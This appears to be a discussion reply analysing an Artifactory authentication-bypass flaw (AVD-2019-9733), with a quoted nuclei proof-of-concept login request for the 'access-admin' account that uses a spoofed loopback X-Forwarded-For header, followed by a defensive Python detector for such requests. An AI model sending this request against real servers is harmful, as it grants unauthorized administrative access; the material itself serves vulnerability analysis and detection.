Replies: 1 comment
-
1. This endpoint is the login endpoint; it allows logging in by entering an account and password.
-
According to the Alibaba Cloud analysis https://avd.aliyun.com/detail?id=AVD-2019-9733
and the analysis of the nuclei PoC:
```http
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
X-Requested-With: artUI
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
Content-Type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/

{"user":"access-admin","password":"password","type":"login"}
```
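When reproducing this, I found that the default password for access-admin in the image is not password. I logged in as admin and then modified access-admin, and found that login also works without X-Forwarded-For: 127.0.0.1.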
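A defender-side check for requests shaped like the one quoted in the post above, as an added example that is not part of the original discussion or of any project's code. The function names, the peer addresses, the host name and the two sample requests are constructed assumptions; the two signals are reported separately so that a login for `access-admin` is still flagged when the `X-Forwarded-For` header is absent.

```python
import ipaddress
import json

LOGIN_PATH = "/artifactory/ui/auth/login"  # path taken from the request quoted in the post

# Constructed sample requests (not captured traffic).
POC_LIKE = (
    "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\r\n"
    "Host: artifactory.example.test\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"user":"access-admin","password":"REDACTED","type":"login"}'
)
NORMAL = POC_LIKE.replace("X-Forwarded-For: 127.0.0.1\r\n", "").replace("access-admin", "alice")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def is_loopback(value):
    try:
        return ipaddress.ip_address(value.strip()).is_loopback
    except ValueError:
        return False

def classify(peer_ip, raw):
    """Return findings for one request; peer_ip is the real TCP peer address."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != LOGIN_PATH:
        return []
    findings = []
    try:
        user = json.loads(body).get("user")
    except (ValueError, AttributeError):
        user = None  # body is not a JSON object
    if user == "access-admin":
        findings.append("login attempt for built-in access-admin account")
    first_hop = headers.get("x-forwarded-for", "").split(",")[0]
    # A loopback value can only be trusted when the peer itself is local.
    if is_loopback(first_hop) and not is_loopback(peer_ip):
        findings.append("loopback X-Forwarded-For supplied by remote peer")
    return findings
```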